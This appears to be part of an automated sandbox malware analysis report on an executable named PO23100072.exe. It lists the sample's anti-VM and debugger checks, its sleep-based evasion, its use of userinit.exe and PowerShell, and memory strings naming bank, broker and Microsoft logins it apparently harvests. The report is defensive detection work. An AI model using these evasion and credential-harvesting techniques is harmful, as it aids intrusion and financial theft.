            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: PO23100072.exe PID: 1788, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\userinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: 78F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: 88F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeMemory allocated: 9AA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E rdtsc 5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5269Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1968Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 1275Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 8698Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\userinit.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\PO23100072.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep count: 1275 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep time: -2550000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep count: 8698 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep time: -17396000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep count: 44 > 30Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep time: -44000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\userinit.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 9_2_0301C290 FindFirstFileW,FindNextFileW,FindClose,9_2_0301C290
            Source: C:\Users\user\Desktop\PO23100072.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
            Source: PO23100072.exe, 00000000.00000002.1495354166.0000000007720000.00000004.08000000.00040000.00000000.sdmp, PO23100072.exe, 00000000.00000002.1482712855.0000000003D9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u?QEmU
            Source: A34E618M.9.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: discord.comVMware20,11696494690f
            Source: A34E618M.9.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,1169649469J
            Source: A34E618M.9.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: A34E618M.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: A34E618M.9.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: PO23100072.exe, 00000000.00000002.1478098149.0000000000EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: A34E618M.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w.interactivebrokers.comVMware20,11696494690}
            Source: A34E618M.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: A34E618M.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: A34E618M.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003112000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: A34E618M.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: A34E618M.9.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,11696494690s
            Source: A34E618M.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: FrMKpuEiehQ.exe, 0000000A.00000002.3906075381.000000000107F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: A34E618M.9.drBinary or memory string: global block list test formVMware20,11696494690
            Source: firefox.exe, 0000000E.00000002.2015559594.000001E7E041C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==/
            Source: PO23100072.exe, 00000000.00000002.1478098149.0000000000EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H1
            Source: A34E618M.9.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: A34E618M.9.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: A34E618M.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: server_stored_cvcVMware
            Source: A34E618M.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: A34E618M.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ers - NDCDYNVMware20,11696494690z
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Transaction PasswordVMware20,11696494690}
            Source: A34E618M.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: A34E618M.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\PO23100072.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E rdtsc 5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_004173A3 LdrLoadDll,5_2_004173A3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01844180 mov eax, dword ptr fs:[00000030h]5_2_01844180
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01844180 mov eax, dword ptr fs:[00000030h]5_2_01844180
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185C188 mov eax, dword ptr fs:[00000030h]5_2_0185C188
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185C188 mov eax, dword ptr fs:[00000030h]5_2_0185C188
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182019F mov eax, dword ptr fs:[00000030h]5_2_0182019F
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6154 mov eax, dword ptr fs:[00000030h]5_2_017A6154
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A6154 mov eax, dword ptr fs:[00000030h]5_2_017A6154
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179C156 mov eax, dword ptr fs:[00000030h]5_2_0179C156
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018661C3 mov eax, dword ptr fs:[00000030h]5_2_018661C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018661C3 mov eax, dword ptr fs:[00000030h]5_2_018661C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0181E1D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E1D0 mov eax, dword ptr fs:[00000030h]5_2_0181E1D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D0124 mov eax, dword ptr fs:[00000030h]5_2_017D0124
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018761E5 mov eax, dword ptr fs:[00000030h]5_2_018761E5
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D01F8 mov eax, dword ptr fs:[00000030h]5_2_017D01F8
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov eax, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov ecx, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov eax, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov eax, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov ecx, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov eax, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov eax, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov ecx, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov eax, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184E10E mov ecx, dword ptr fs:[00000030h]5_2_0184E10E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01860115 mov eax, dword ptr fs:[00000030h]5_2_01860115
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184A118 mov ecx, dword ptr fs:[00000030h]5_2_0184A118
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184A118 mov eax, dword ptr fs:[00000030h]5_2_0184A118
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184A118 mov eax, dword ptr fs:[00000030h]5_2_0184A118
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184A118 mov eax, dword ptr fs:[00000030h]5_2_0184A118
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01834144 mov ecx, dword ptr fs:[00000030h]5_2_01834144
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01834144 mov eax, dword ptr fs:[00000030h]5_2_01834144
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01838158 mov eax, dword ptr fs:[00000030h]5_2_01838158
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179A197 mov eax, dword ptr fs:[00000030h]5_2_0179A197
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179A197 mov eax, dword ptr fs:[00000030h]5_2_0179A197
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179A197 mov eax, dword ptr fs:[00000030h]5_2_0179A197
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E0185 mov eax, dword ptr fs:[00000030h]5_2_017E0185
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CC073 mov eax, dword ptr fs:[00000030h]5_2_017CC073
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A2050 mov eax, dword ptr fs:[00000030h]5_2_017A2050
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018380A8 mov eax, dword ptr fs:[00000030h]5_2_018380A8
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018660B8 mov eax, dword ptr fs:[00000030h]5_2_018660B8
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018660B8 mov ecx, dword ptr fs:[00000030h]5_2_018660B8
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179A020 mov eax, dword ptr fs:[00000030h]5_2_0179A020
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179C020 mov eax, dword ptr fs:[00000030h]5_2_0179C020
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018220DE mov eax, dword ptr fs:[00000030h]5_2_018220DE
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018260E0 mov eax, dword ptr fs:[00000030h]5_2_018260E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE016 mov eax, dword ptr fs:[00000030h]5_2_017BE016
